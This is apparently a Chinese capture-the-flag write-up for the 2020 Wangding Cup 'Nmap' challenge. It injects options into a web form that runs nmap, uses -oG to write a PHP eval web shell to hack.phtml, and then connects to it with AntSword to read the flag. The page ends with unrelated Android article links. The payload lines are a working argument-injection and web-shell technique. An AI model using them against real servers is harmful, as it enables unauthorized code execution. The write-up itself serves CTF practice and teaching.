命令执行 [网鼎杯 2020 朱雀组]Nmap1

打开题目

输入127.0.0.1

可以得到回显结果,猜测是命令执行,尝试使用|分隔地址与命令

127.0.0.1 | ls

可以看到|\转义,尝试使用;

直接放入Payload:

' <?php @eval($_POST["hack"]);?> -oG hack.php '

尝试修改文件名后缀为phtml

' <?php @eval($_POST["hack"]);?> -oG hack.phtml '

加上扫描的地址:127.0.0.1

127.0.0.1 | ' <?= @eval($_POST["hack"]);?> -oG hack.phtml'

得到

查看扫描列表:

查看写入的文件,即访问hack.phtml

蚁剑连接

在根目录找到了flag

相关推荐
studyForMokey26 分钟前
【Android面试】Activity生命周期专题
android·面试·职场和发展
chehaoman1 小时前
MySQL的索引
android·数据库·mysql
恋猫de小郭4 小时前
React Native 鸿蒙 2026 路线发布,为什么它的适配成本那么高?
android·前端·react native
studyForMokey4 小时前
【Android面试】窗口机制专题
android·面试·职场和发展
用户013201436035 小时前
Android 资源管理与常用布局详解|基础入门
android
陆业聪6 小时前
从 OpenClaw 到 Android:Harness Engineering 是怎么让 Agent 变得可用的
android·人工智能·ai编程
stevenzqzq8 小时前
颜色透明度转换技术文档(Android/Compose)
android
巴黎没有摩天轮Li8 小时前
Android JVMTI 接入流程
android
2501_915909069 小时前
iOS 抓包不越狱,代理抓包 和 数据线直连抓包两种实现方式
android·ios·小程序·https·uni-app·iphone·webview
城东米粉儿9 小时前
Android VCL 和 NAL笔记
android